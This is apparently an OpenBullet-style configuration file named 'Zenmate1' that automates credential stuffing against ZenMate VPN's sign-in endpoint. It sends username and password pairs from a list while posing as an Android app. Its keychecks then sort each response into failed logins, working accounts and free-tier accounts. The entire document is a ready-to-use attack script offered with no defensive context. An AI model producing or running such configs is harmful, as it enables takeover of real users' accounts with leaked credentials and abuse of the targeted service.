[SETTINGS]
{
  "Name": "Zenmate1",
  "SuggestedBots": 1,
  "LastModified": "2019-04-12T23:57:02.1611606-05:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.0.1",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.zcdn.de/sign_in" 
  CONTENT "{\"auth_id\":\"<USER>\",\"auth_method\":\"user\",\"auth_secret\":\"<PASS>\",\"client_env\":\"browser\u003dandroid, memory\u003d2071580kB, resolution\u003d720x1280\",\"client_name\":\"Android\",\"client_type\":\"mobile\",\"client_ver\":243,\"install_id\":\"6759774b-8f5c-4c71-8f34-8226c7f98e05\",\"locations_scope\":\"partial\",\"os_name\":\"Android\",\"os_ver\":\"4.4.2\",\"show_premium\":true}" 
  CONTENTTYPE "application/json; charset=UTF-8" 
  HEADER "User-Agent: okhttp/2.5.0" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password" 
  KEYCHAIN Success OR 
    KEY "user\":{\"id\":" 
  KEYCHAIN Custom "FREE" OR 
    KEY "account_type\":\"FREE\",\"" 

